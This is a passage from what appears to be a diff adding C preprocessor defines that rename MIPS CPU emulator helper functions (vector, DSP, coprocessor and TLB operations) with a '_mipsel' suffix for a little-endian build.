mips_machine_init mips_machine_init_mipsel +#define cpu_mips_kseg0_to_phys cpu_mips_kseg0_to_phys_mipsel +#define cpu_mips_phys_to_kseg0 cpu_mips_phys_to_kseg0_mipsel +#define cpu_mips_kvm_um_phys_to_kseg0 cpu_mips_kvm_um_phys_to_kseg0_mipsel +#define mips_cpu_register_types mips_cpu_register_types_mipsel +#define cpu_mips_init cpu_mips_init_mipsel +#define cpu_state_reset cpu_state_reset_mipsel +#define helper_msa_andi_b helper_msa_andi_b_mipsel +#define helper_msa_ori_b helper_msa_ori_b_mipsel +#define helper_msa_nori_b helper_msa_nori_b_mipsel +#define 
helper_msa_xori_b helper_msa_xori_b_mipsel +#define helper_msa_bmnzi_b helper_msa_bmnzi_b_mipsel +#define helper_msa_bmzi_b helper_msa_bmzi_b_mipsel +#define helper_msa_bseli_b helper_msa_bseli_b_mipsel +#define helper_msa_shf_df helper_msa_shf_df_mipsel +#define helper_msa_and_v helper_msa_and_v_mipsel +#define helper_msa_or_v helper_msa_or_v_mipsel +#define helper_msa_nor_v helper_msa_nor_v_mipsel +#define helper_msa_xor_v helper_msa_xor_v_mipsel +#define helper_msa_bmnz_v helper_msa_bmnz_v_mipsel +#define helper_msa_bmz_v helper_msa_bmz_v_mipsel +#define helper_msa_bsel_v helper_msa_bsel_v_mipsel +#define helper_msa_addvi_df helper_msa_addvi_df_mipsel +#define helper_msa_subvi_df helper_msa_subvi_df_mipsel +#define helper_msa_ceqi_df helper_msa_ceqi_df_mipsel +#define helper_msa_clei_s_df helper_msa_clei_s_df_mipsel +#define helper_msa_clei_u_df helper_msa_clei_u_df_mipsel +#define helper_msa_clti_s_df helper_msa_clti_s_df_mipsel +#define helper_msa_clti_u_df helper_msa_clti_u_df_mipsel +#define helper_msa_maxi_s_df helper_msa_maxi_s_df_mipsel +#define helper_msa_maxi_u_df helper_msa_maxi_u_df_mipsel +#define helper_msa_mini_s_df helper_msa_mini_s_df_mipsel +#define helper_msa_mini_u_df helper_msa_mini_u_df_mipsel +#define helper_msa_ldi_df helper_msa_ldi_df_mipsel +#define helper_msa_slli_df helper_msa_slli_df_mipsel +#define helper_msa_srai_df helper_msa_srai_df_mipsel +#define helper_msa_srli_df helper_msa_srli_df_mipsel +#define helper_msa_bclri_df helper_msa_bclri_df_mipsel +#define helper_msa_bseti_df helper_msa_bseti_df_mipsel +#define helper_msa_bnegi_df helper_msa_bnegi_df_mipsel +#define helper_msa_sat_s_df helper_msa_sat_s_df_mipsel +#define helper_msa_sat_u_df helper_msa_sat_u_df_mipsel +#define helper_msa_srari_df helper_msa_srari_df_mipsel +#define helper_msa_srlri_df helper_msa_srlri_df_mipsel +#define helper_msa_binsli_df helper_msa_binsli_df_mipsel +#define helper_msa_binsri_df helper_msa_binsri_df_mipsel +#define helper_msa_sll_df 
helper_msa_sll_df_mipsel +#define helper_msa_sra_df helper_msa_sra_df_mipsel +#define helper_msa_srl_df helper_msa_srl_df_mipsel +#define helper_msa_bclr_df helper_msa_bclr_df_mipsel +#define helper_msa_bset_df helper_msa_bset_df_mipsel +#define helper_msa_bneg_df helper_msa_bneg_df_mipsel +#define helper_msa_addv_df helper_msa_addv_df_mipsel +#define helper_msa_subv_df helper_msa_subv_df_mipsel +#define helper_msa_max_s_df helper_msa_max_s_df_mipsel +#define helper_msa_max_u_df helper_msa_max_u_df_mipsel +#define helper_msa_min_s_df helper_msa_min_s_df_mipsel +#define helper_msa_min_u_df helper_msa_min_u_df_mipsel +#define helper_msa_max_a_df helper_msa_max_a_df_mipsel +#define helper_msa_min_a_df helper_msa_min_a_df_mipsel +#define helper_msa_ceq_df helper_msa_ceq_df_mipsel +#define helper_msa_clt_s_df helper_msa_clt_s_df_mipsel +#define helper_msa_clt_u_df helper_msa_clt_u_df_mipsel +#define helper_msa_cle_s_df helper_msa_cle_s_df_mipsel +#define helper_msa_cle_u_df helper_msa_cle_u_df_mipsel +#define helper_msa_add_a_df helper_msa_add_a_df_mipsel +#define helper_msa_adds_a_df helper_msa_adds_a_df_mipsel +#define helper_msa_adds_s_df helper_msa_adds_s_df_mipsel +#define helper_msa_adds_u_df helper_msa_adds_u_df_mipsel +#define helper_msa_ave_s_df helper_msa_ave_s_df_mipsel +#define helper_msa_ave_u_df helper_msa_ave_u_df_mipsel +#define helper_msa_aver_s_df helper_msa_aver_s_df_mipsel +#define helper_msa_aver_u_df helper_msa_aver_u_df_mipsel +#define helper_msa_subs_s_df helper_msa_subs_s_df_mipsel +#define helper_msa_subs_u_df helper_msa_subs_u_df_mipsel +#define helper_msa_subsus_u_df helper_msa_subsus_u_df_mipsel +#define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mipsel +#define helper_msa_asub_s_df helper_msa_asub_s_df_mipsel +#define helper_msa_asub_u_df helper_msa_asub_u_df_mipsel +#define helper_msa_mulv_df helper_msa_mulv_df_mipsel +#define helper_msa_div_s_df helper_msa_div_s_df_mipsel +#define helper_msa_div_u_df helper_msa_div_u_df_mipsel +#define 
helper_msa_mod_s_df helper_msa_mod_s_df_mipsel +#define helper_msa_mod_u_df helper_msa_mod_u_df_mipsel +#define helper_msa_dotp_s_df helper_msa_dotp_s_df_mipsel +#define helper_msa_dotp_u_df helper_msa_dotp_u_df_mipsel +#define helper_msa_srar_df helper_msa_srar_df_mipsel +#define helper_msa_srlr_df helper_msa_srlr_df_mipsel +#define helper_msa_hadd_s_df helper_msa_hadd_s_df_mipsel +#define helper_msa_hadd_u_df helper_msa_hadd_u_df_mipsel +#define helper_msa_hsub_s_df helper_msa_hsub_s_df_mipsel +#define helper_msa_hsub_u_df helper_msa_hsub_u_df_mipsel +#define helper_msa_mul_q_df helper_msa_mul_q_df_mipsel +#define helper_msa_mulr_q_df helper_msa_mulr_q_df_mipsel +#define helper_msa_sld_df helper_msa_sld_df_mipsel +#define helper_msa_maddv_df helper_msa_maddv_df_mipsel +#define helper_msa_msubv_df helper_msa_msubv_df_mipsel +#define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mipsel +#define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mipsel +#define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mipsel +#define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mipsel +#define helper_msa_binsl_df helper_msa_binsl_df_mipsel +#define helper_msa_binsr_df helper_msa_binsr_df_mipsel +#define helper_msa_madd_q_df helper_msa_madd_q_df_mipsel +#define helper_msa_msub_q_df helper_msa_msub_q_df_mipsel +#define helper_msa_maddr_q_df helper_msa_maddr_q_df_mipsel +#define helper_msa_msubr_q_df helper_msa_msubr_q_df_mipsel +#define helper_msa_splat_df helper_msa_splat_df_mipsel +#define helper_msa_pckev_df helper_msa_pckev_df_mipsel +#define helper_msa_pckod_df helper_msa_pckod_df_mipsel +#define helper_msa_ilvl_df helper_msa_ilvl_df_mipsel +#define helper_msa_ilvr_df helper_msa_ilvr_df_mipsel +#define helper_msa_ilvev_df helper_msa_ilvev_df_mipsel +#define helper_msa_ilvod_df helper_msa_ilvod_df_mipsel +#define helper_msa_vshf_df helper_msa_vshf_df_mipsel +#define helper_msa_sldi_df helper_msa_sldi_df_mipsel +#define helper_msa_splati_df helper_msa_splati_df_mipsel +#define 
helper_msa_copy_s_df helper_msa_copy_s_df_mipsel +#define helper_msa_copy_u_df helper_msa_copy_u_df_mipsel +#define helper_msa_insert_df helper_msa_insert_df_mipsel +#define helper_msa_insve_df helper_msa_insve_df_mipsel +#define helper_msa_ctcmsa helper_msa_ctcmsa_mipsel +#define helper_msa_cfcmsa helper_msa_cfcmsa_mipsel +#define helper_msa_move_v helper_msa_move_v_mipsel +#define helper_msa_fill_df helper_msa_fill_df_mipsel +#define helper_msa_nlzc_df helper_msa_nlzc_df_mipsel +#define helper_msa_nloc_df helper_msa_nloc_df_mipsel +#define helper_msa_pcnt_df helper_msa_pcnt_df_mipsel +#define helper_msa_fcaf_df helper_msa_fcaf_df_mipsel +#define helper_msa_fcun_df helper_msa_fcun_df_mipsel +#define helper_msa_fceq_df helper_msa_fceq_df_mipsel +#define helper_msa_fcueq_df helper_msa_fcueq_df_mipsel +#define helper_msa_fclt_df helper_msa_fclt_df_mipsel +#define helper_msa_fcult_df helper_msa_fcult_df_mipsel +#define helper_msa_fcle_df helper_msa_fcle_df_mipsel +#define helper_msa_fcule_df helper_msa_fcule_df_mipsel +#define helper_msa_fsaf_df helper_msa_fsaf_df_mipsel +#define helper_msa_fsun_df helper_msa_fsun_df_mipsel +#define helper_msa_fseq_df helper_msa_fseq_df_mipsel +#define helper_msa_fsueq_df helper_msa_fsueq_df_mipsel +#define helper_msa_fslt_df helper_msa_fslt_df_mipsel +#define helper_msa_fsult_df helper_msa_fsult_df_mipsel +#define helper_msa_fsle_df helper_msa_fsle_df_mipsel +#define helper_msa_fsule_df helper_msa_fsule_df_mipsel +#define helper_msa_fcor_df helper_msa_fcor_df_mipsel +#define helper_msa_fcune_df helper_msa_fcune_df_mipsel +#define helper_msa_fcne_df helper_msa_fcne_df_mipsel +#define helper_msa_fsor_df helper_msa_fsor_df_mipsel +#define helper_msa_fsune_df helper_msa_fsune_df_mipsel +#define helper_msa_fsne_df helper_msa_fsne_df_mipsel +#define helper_msa_fadd_df helper_msa_fadd_df_mipsel +#define helper_msa_fsub_df helper_msa_fsub_df_mipsel +#define helper_msa_fmul_df helper_msa_fmul_df_mipsel +#define helper_msa_fdiv_df 
helper_msa_fdiv_df_mipsel +#define helper_msa_fmadd_df helper_msa_fmadd_df_mipsel +#define helper_msa_fmsub_df helper_msa_fmsub_df_mipsel +#define helper_msa_fexp2_df helper_msa_fexp2_df_mipsel +#define helper_msa_fexdo_df helper_msa_fexdo_df_mipsel +#define helper_msa_ftq_df helper_msa_ftq_df_mipsel +#define helper_msa_fmin_df helper_msa_fmin_df_mipsel +#define helper_msa_fmin_a_df helper_msa_fmin_a_df_mipsel +#define helper_msa_fmax_df helper_msa_fmax_df_mipsel +#define helper_msa_fmax_a_df helper_msa_fmax_a_df_mipsel +#define helper_msa_fclass_df helper_msa_fclass_df_mipsel +#define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mipsel +#define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mipsel +#define helper_msa_fsqrt_df helper_msa_fsqrt_df_mipsel +#define helper_msa_frsqrt_df helper_msa_frsqrt_df_mipsel +#define helper_msa_frcp_df helper_msa_frcp_df_mipsel +#define helper_msa_frint_df helper_msa_frint_df_mipsel +#define helper_msa_flog2_df helper_msa_flog2_df_mipsel +#define helper_msa_fexupl_df helper_msa_fexupl_df_mipsel +#define helper_msa_fexupr_df helper_msa_fexupr_df_mipsel +#define helper_msa_ffql_df helper_msa_ffql_df_mipsel +#define helper_msa_ffqr_df helper_msa_ffqr_df_mipsel +#define helper_msa_ftint_s_df helper_msa_ftint_s_df_mipsel +#define helper_msa_ftint_u_df helper_msa_ftint_u_df_mipsel +#define helper_msa_ffint_s_df helper_msa_ffint_s_df_mipsel +#define helper_msa_ffint_u_df helper_msa_ffint_u_df_mipsel +#define helper_paddsb helper_paddsb_mipsel +#define helper_paddusb helper_paddusb_mipsel +#define helper_paddsh helper_paddsh_mipsel +#define helper_paddush helper_paddush_mipsel +#define helper_paddb helper_paddb_mipsel +#define helper_paddh helper_paddh_mipsel +#define helper_paddw helper_paddw_mipsel +#define helper_psubsb helper_psubsb_mipsel +#define helper_psubusb helper_psubusb_mipsel +#define helper_psubsh helper_psubsh_mipsel +#define helper_psubush helper_psubush_mipsel +#define helper_psubb helper_psubb_mipsel +#define 
helper_psubh helper_psubh_mipsel +#define helper_psubw helper_psubw_mipsel +#define helper_pshufh helper_pshufh_mipsel +#define helper_packsswh helper_packsswh_mipsel +#define helper_packsshb helper_packsshb_mipsel +#define helper_packushb helper_packushb_mipsel +#define helper_punpcklwd helper_punpcklwd_mipsel +#define helper_punpckhwd helper_punpckhwd_mipsel +#define helper_punpcklhw helper_punpcklhw_mipsel +#define helper_punpckhhw helper_punpckhhw_mipsel +#define helper_punpcklbh helper_punpcklbh_mipsel +#define helper_punpckhbh helper_punpckhbh_mipsel +#define helper_pavgh helper_pavgh_mipsel +#define helper_pavgb helper_pavgb_mipsel +#define helper_pmaxsh helper_pmaxsh_mipsel +#define helper_pminsh helper_pminsh_mipsel +#define helper_pmaxub helper_pmaxub_mipsel +#define helper_pminub helper_pminub_mipsel +#define helper_pcmpeqw helper_pcmpeqw_mipsel +#define helper_pcmpgtw helper_pcmpgtw_mipsel +#define helper_pcmpeqh helper_pcmpeqh_mipsel +#define helper_pcmpgth helper_pcmpgth_mipsel +#define helper_pcmpeqb helper_pcmpeqb_mipsel +#define helper_pcmpgtb helper_pcmpgtb_mipsel +#define helper_psllw helper_psllw_mipsel +#define helper_psrlw helper_psrlw_mipsel +#define helper_psraw helper_psraw_mipsel +#define helper_psllh helper_psllh_mipsel +#define helper_psrlh helper_psrlh_mipsel +#define helper_psrah helper_psrah_mipsel +#define helper_pmullh helper_pmullh_mipsel +#define helper_pmulhh helper_pmulhh_mipsel +#define helper_pmulhuh helper_pmulhuh_mipsel +#define helper_pmaddhw helper_pmaddhw_mipsel +#define helper_pasubub helper_pasubub_mipsel +#define helper_biadd helper_biadd_mipsel +#define helper_pmovmskb helper_pmovmskb_mipsel +#define helper_absq_s_ph helper_absq_s_ph_mipsel +#define helper_absq_s_qb helper_absq_s_qb_mipsel +#define helper_absq_s_w helper_absq_s_w_mipsel +#define helper_addqh_ph helper_addqh_ph_mipsel +#define helper_addqh_r_ph helper_addqh_r_ph_mipsel +#define helper_addqh_r_w helper_addqh_r_w_mipsel +#define helper_addqh_w 
helper_addqh_w_mipsel +#define helper_adduh_qb helper_adduh_qb_mipsel +#define helper_adduh_r_qb helper_adduh_r_qb_mipsel +#define helper_subqh_ph helper_subqh_ph_mipsel +#define helper_subqh_r_ph helper_subqh_r_ph_mipsel +#define helper_subqh_r_w helper_subqh_r_w_mipsel +#define helper_subqh_w helper_subqh_w_mipsel +#define helper_addq_ph helper_addq_ph_mipsel +#define helper_addq_s_ph helper_addq_s_ph_mipsel +#define helper_addq_s_w helper_addq_s_w_mipsel +#define helper_addu_ph helper_addu_ph_mipsel +#define helper_addu_qb helper_addu_qb_mipsel +#define helper_addu_s_ph helper_addu_s_ph_mipsel +#define helper_addu_s_qb helper_addu_s_qb_mipsel +#define helper_subq_ph helper_subq_ph_mipsel +#define helper_subq_s_ph helper_subq_s_ph_mipsel +#define helper_subq_s_w helper_subq_s_w_mipsel +#define helper_subu_ph helper_subu_ph_mipsel +#define helper_subu_qb helper_subu_qb_mipsel +#define helper_subu_s_ph helper_subu_s_ph_mipsel +#define helper_subu_s_qb helper_subu_s_qb_mipsel +#define helper_subuh_qb helper_subuh_qb_mipsel +#define helper_subuh_r_qb helper_subuh_r_qb_mipsel +#define helper_addsc helper_addsc_mipsel +#define helper_addwc helper_addwc_mipsel +#define helper_modsub helper_modsub_mipsel +#define helper_raddu_w_qb helper_raddu_w_qb_mipsel +#define helper_precr_qb_ph helper_precr_qb_ph_mipsel +#define helper_precrq_qb_ph helper_precrq_qb_ph_mipsel +#define helper_precr_sra_ph_w helper_precr_sra_ph_w_mipsel +#define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mipsel +#define helper_precrq_ph_w helper_precrq_ph_w_mipsel +#define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mipsel +#define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mipsel +#define helper_precequ_ph_qbl helper_precequ_ph_qbl_mipsel +#define helper_precequ_ph_qbr helper_precequ_ph_qbr_mipsel +#define helper_precequ_ph_qbla helper_precequ_ph_qbla_mipsel +#define helper_precequ_ph_qbra helper_precequ_ph_qbra_mipsel +#define helper_preceu_ph_qbl helper_preceu_ph_qbl_mipsel +#define 
helper_preceu_ph_qbr helper_preceu_ph_qbr_mipsel +#define helper_preceu_ph_qbla helper_preceu_ph_qbla_mipsel +#define helper_preceu_ph_qbra helper_preceu_ph_qbra_mipsel +#define helper_shll_qb helper_shll_qb_mipsel +#define helper_shrl_qb helper_shrl_qb_mipsel +#define helper_shra_qb helper_shra_qb_mipsel +#define helper_shra_r_qb helper_shra_r_qb_mipsel +#define helper_shll_ph helper_shll_ph_mipsel +#define helper_shll_s_ph helper_shll_s_ph_mipsel +#define helper_shll_s_w helper_shll_s_w_mipsel +#define helper_shra_r_w helper_shra_r_w_mipsel +#define helper_shrl_ph helper_shrl_ph_mipsel +#define helper_shra_ph helper_shra_ph_mipsel +#define helper_shra_r_ph helper_shra_r_ph_mipsel +#define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mipsel +#define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mipsel +#define helper_mulq_rs_ph helper_mulq_rs_ph_mipsel +#define helper_mul_ph helper_mul_ph_mipsel +#define helper_mul_s_ph helper_mul_s_ph_mipsel +#define helper_mulq_s_ph helper_mulq_s_ph_mipsel +#define helper_muleq_s_w_phl helper_muleq_s_w_phl_mipsel +#define helper_muleq_s_w_phr helper_muleq_s_w_phr_mipsel +#define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mipsel +#define helper_mulsa_w_ph helper_mulsa_w_ph_mipsel +#define helper_dpau_h_qbl helper_dpau_h_qbl_mipsel +#define helper_dpau_h_qbr helper_dpau_h_qbr_mipsel +#define helper_dpsu_h_qbl helper_dpsu_h_qbl_mipsel +#define helper_dpsu_h_qbr helper_dpsu_h_qbr_mipsel +#define helper_dpa_w_ph helper_dpa_w_ph_mipsel +#define helper_dpax_w_ph helper_dpax_w_ph_mipsel +#define helper_dps_w_ph helper_dps_w_ph_mipsel +#define helper_dpsx_w_ph helper_dpsx_w_ph_mipsel +#define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mipsel +#define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mipsel +#define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mipsel +#define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mipsel +#define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mipsel +#define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mipsel +#define helper_dpaq_sa_l_w 
helper_dpaq_sa_l_w_mipsel +#define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mipsel +#define helper_maq_s_w_phl helper_maq_s_w_phl_mipsel +#define helper_maq_s_w_phr helper_maq_s_w_phr_mipsel +#define helper_maq_sa_w_phl helper_maq_sa_w_phl_mipsel +#define helper_maq_sa_w_phr helper_maq_sa_w_phr_mipsel +#define helper_mulq_s_w helper_mulq_s_w_mipsel +#define helper_mulq_rs_w helper_mulq_rs_w_mipsel +#define helper_bitrev helper_bitrev_mipsel +#define helper_insv helper_insv_mipsel +#define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mipsel +#define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mipsel +#define helper_cmpgu_le_qb helper_cmpgu_le_qb_mipsel +#define helper_cmpu_eq_qb helper_cmpu_eq_qb_mipsel +#define helper_cmpu_lt_qb helper_cmpu_lt_qb_mipsel +#define helper_cmpu_le_qb helper_cmpu_le_qb_mipsel +#define helper_cmp_eq_ph helper_cmp_eq_ph_mipsel +#define helper_cmp_lt_ph helper_cmp_lt_ph_mipsel +#define helper_cmp_le_ph helper_cmp_le_ph_mipsel +#define helper_pick_qb helper_pick_qb_mipsel +#define helper_pick_ph helper_pick_ph_mipsel +#define helper_packrl_ph helper_packrl_ph_mipsel +#define helper_extr_w helper_extr_w_mipsel +#define helper_extr_r_w helper_extr_r_w_mipsel +#define helper_extr_rs_w helper_extr_rs_w_mipsel +#define helper_extr_s_h helper_extr_s_h_mipsel +#define helper_extp helper_extp_mipsel +#define helper_extpdp helper_extpdp_mipsel +#define helper_shilo helper_shilo_mipsel +#define helper_mthlip helper_mthlip_mipsel +#define cpu_wrdsp cpu_wrdsp_mipsel +#define helper_wrdsp helper_wrdsp_mipsel +#define cpu_rddsp cpu_rddsp_mipsel +#define helper_rddsp helper_rddsp_mipsel +#define helper_raise_exception_err helper_raise_exception_err_mipsel +#define helper_clo helper_clo_mipsel +#define helper_clz helper_clz_mipsel +#define helper_muls helper_muls_mipsel +#define helper_mulsu helper_mulsu_mipsel +#define helper_macc helper_macc_mipsel +#define helper_macchi helper_macchi_mipsel +#define helper_maccu helper_maccu_mipsel +#define helper_macchiu 
helper_macchiu_mipsel +#define helper_msac helper_msac_mipsel +#define helper_msachi helper_msachi_mipsel +#define helper_msacu helper_msacu_mipsel +#define helper_msachiu helper_msachiu_mipsel +#define helper_mulhi helper_mulhi_mipsel +#define helper_mulhiu helper_mulhiu_mipsel +#define helper_mulshi helper_mulshi_mipsel +#define helper_mulshiu helper_mulshiu_mipsel +#define helper_bitswap helper_bitswap_mipsel +#define helper_ll helper_ll_mipsel +#define helper_sc helper_sc_mipsel +#define helper_swl helper_swl_mipsel +#define helper_swr helper_swr_mipsel +#define helper_lwm helper_lwm_mipsel +#define helper_swm helper_swm_mipsel +#define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mipsel +#define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mipsel +#define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mipsel +#define helper_mfc0_random helper_mfc0_random_mipsel +#define helper_mfc0_tcstatus helper_mfc0_tcstatus_mipsel +#define helper_mftc0_tcstatus helper_mftc0_tcstatus_mipsel +#define helper_mfc0_tcbind helper_mfc0_tcbind_mipsel +#define helper_mftc0_tcbind helper_mftc0_tcbind_mipsel +#define helper_mfc0_tcrestart helper_mfc0_tcrestart_mipsel +#define helper_mftc0_tcrestart helper_mftc0_tcrestart_mipsel +#define helper_mfc0_tchalt helper_mfc0_tchalt_mipsel +#define helper_mftc0_tchalt helper_mftc0_tchalt_mipsel +#define helper_mfc0_tccontext helper_mfc0_tccontext_mipsel +#define helper_mftc0_tccontext helper_mftc0_tccontext_mipsel +#define helper_mfc0_tcschedule helper_mfc0_tcschedule_mipsel +#define helper_mftc0_tcschedule helper_mftc0_tcschedule_mipsel +#define helper_mfc0_tcschefback helper_mfc0_tcschefback_mipsel +#define helper_mftc0_tcschefback helper_mftc0_tcschefback_mipsel +#define helper_mfc0_count helper_mfc0_count_mipsel +#define helper_mftc0_entryhi helper_mftc0_entryhi_mipsel +#define helper_mftc0_cause helper_mftc0_cause_mipsel +#define helper_mftc0_status helper_mftc0_status_mipsel +#define helper_mfc0_lladdr helper_mfc0_lladdr_mipsel +#define 
helper_mfc0_watchlo helper_mfc0_watchlo_mipsel +#define helper_mfc0_watchhi helper_mfc0_watchhi_mipsel +#define helper_mfc0_debug helper_mfc0_debug_mipsel +#define helper_mftc0_debug helper_mftc0_debug_mipsel +#define helper_mtc0_index helper_mtc0_index_mipsel +#define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mipsel +#define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mipsel +#define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mipsel +#define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mipsel +#define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mipsel +#define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mipsel +#define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mipsel +#define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mipsel +#define helper_mtc0_yqmask helper_mtc0_yqmask_mipsel +#define helper_mtc0_vpeopt helper_mtc0_vpeopt_mipsel +#define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mipsel +#define helper_mtc0_tcstatus helper_mtc0_tcstatus_mipsel +#define helper_mttc0_tcstatus helper_mttc0_tcstatus_mipsel +#define helper_mtc0_tcbind helper_mtc0_tcbind_mipsel +#define helper_mttc0_tcbind helper_mttc0_tcbind_mipsel +#define helper_mtc0_tcrestart helper_mtc0_tcrestart_mipsel +#define helper_mttc0_tcrestart helper_mttc0_tcrestart_mipsel +#define helper_mtc0_tchalt helper_mtc0_tchalt_mipsel +#define helper_mttc0_tchalt helper_mttc0_tchalt_mipsel +#define helper_mtc0_tccontext helper_mtc0_tccontext_mipsel +#define helper_mttc0_tccontext helper_mttc0_tccontext_mipsel +#define helper_mtc0_tcschedule helper_mtc0_tcschedule_mipsel +#define helper_mttc0_tcschedule helper_mttc0_tcschedule_mipsel +#define helper_mtc0_tcschefback helper_mtc0_tcschefback_mipsel +#define helper_mttc0_tcschefback helper_mttc0_tcschefback_mipsel +#define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mipsel +#define helper_mtc0_context helper_mtc0_context_mipsel +#define helper_mtc0_pagemask helper_mtc0_pagemask_mipsel +#define helper_mtc0_pagegrain helper_mtc0_pagegrain_mipsel +#define 
helper_mtc0_wired helper_mtc0_wired_mipsel +#define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mipsel +#define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mipsel +#define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mipsel +#define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mipsel +#define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mipsel +#define helper_mtc0_hwrena helper_mtc0_hwrena_mipsel +#define helper_mtc0_count helper_mtc0_count_mipsel +#define helper_mtc0_entryhi helper_mtc0_entryhi_mipsel +#define helper_mttc0_entryhi helper_mttc0_entryhi_mipsel +#define helper_mtc0_compare helper_mtc0_compare_mipsel +#define helper_mtc0_status helper_mtc0_status_mipsel +#define helper_mttc0_status helper_mttc0_status_mipsel +#define helper_mtc0_intctl helper_mtc0_intctl_mipsel +#define helper_mtc0_srsctl helper_mtc0_srsctl_mipsel +#define helper_mtc0_cause helper_mtc0_cause_mipsel +#define helper_mttc0_cause helper_mttc0_cause_mipsel +#define helper_mftc0_epc helper_mftc0_epc_mipsel +#define helper_mftc0_ebase helper_mftc0_ebase_mipsel +#define helper_mtc0_ebase helper_mtc0_ebase_mipsel +#define helper_mttc0_ebase helper_mttc0_ebase_mipsel +#define helper_mftc0_configx helper_mftc0_configx_mipsel +#define helper_mtc0_config0 helper_mtc0_config0_mipsel +#define helper_mtc0_config2 helper_mtc0_config2_mipsel +#define helper_mtc0_config4 helper_mtc0_config4_mipsel +#define helper_mtc0_config5 helper_mtc0_config5_mipsel +#define helper_mtc0_lladdr helper_mtc0_lladdr_mipsel +#define helper_mtc0_watchlo helper_mtc0_watchlo_mipsel +#define helper_mtc0_watchhi helper_mtc0_watchhi_mipsel +#define helper_mtc0_xcontext helper_mtc0_xcontext_mipsel +#define helper_mtc0_framemask helper_mtc0_framemask_mipsel +#define helper_mtc0_debug helper_mtc0_debug_mipsel +#define helper_mttc0_debug helper_mttc0_debug_mipsel +#define helper_mtc0_performance0 helper_mtc0_performance0_mipsel +#define helper_mtc0_taglo helper_mtc0_taglo_mipsel +#define helper_mtc0_datalo helper_mtc0_datalo_mipsel +#define 
helper_mtc0_taghi helper_mtc0_taghi_mipsel +#define helper_mtc0_datahi helper_mtc0_datahi_mipsel +#define helper_mftgpr helper_mftgpr_mipsel +#define helper_mftlo helper_mftlo_mipsel +#define helper_mfthi helper_mfthi_mipsel +#define helper_mftacx helper_mftacx_mipsel +#define helper_mftdsp helper_mftdsp_mipsel +#define helper_mttgpr helper_mttgpr_mipsel +#define helper_mttlo helper_mttlo_mipsel +#define helper_mtthi helper_mtthi_mipsel +#define helper_mttacx helper_mttacx_mipsel +#define helper_mttdsp helper_mttdsp_mipsel +#define helper_dmt helper_dmt_mipsel +#define helper_emt helper_emt_mipsel +#define helper_dvpe helper_dvpe_mipsel +#define helper_evpe helper_evpe_mipsel +#define helper_fork helper_fork_mipsel +#define helper_yield helper_yield_mipsel +#define r4k_helper_tlbinv r4k_helper_tlbinv_mipsel +#define r4k_helper_tlbinvf r4k_helper_tlbinvf_mipsel +#define r4k_helper_tlbwi r4k_helper_tlbwi_mipsel +#define r4k_helper_tlbwr r4k_helper_tlbwr_mipsel +#define r4k_helper_tlbp r4k_helper_tlbp_mipsel +#define r4k_helper_tlbr r4k_helper_tlbr_mipsel +#define helper_tlbwi helper_tlbwi_mipsel +#define helper_tlbwr helper_tlbwr_mipsel +#define helper_tlbp helper_tlbp_mipsel +#define helper_tlbr helper_tlbr_mipsel +#define helper_tlbinv helper_tlbinv_mipsel +#define helper_tlbinvf helper_tlbinvf_mipsel +#define helper_di helper_di_mipsel +#define helper_ei helper_ei_mipsel +#define helper_eret helper_eret_mipsel +#define helper_deret helper_deret_mipsel +#define helper_rdhwr_cpunum helper_rdhwr_cpunum_mipsel +#define helper_rdhwr_synci_step helper_rdhwr_synci_step_mipsel +#define helper_rdhwr_cc helper_rdhwr_cc_mipsel +#define helper_rdhwr_ccres helper_rdhwr_ccres_mipsel +#define helper_pmon helper_pmon_mipsel +#define helper_wait helper_wait_mipsel +#define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mipsel +#define mips_cpu_unassigned_access mips_cpu_unassigned_access_mipsel +#define ieee_rm ieee_rm_mipsel +#define helper_cfc1 helper_cfc1_mipsel 
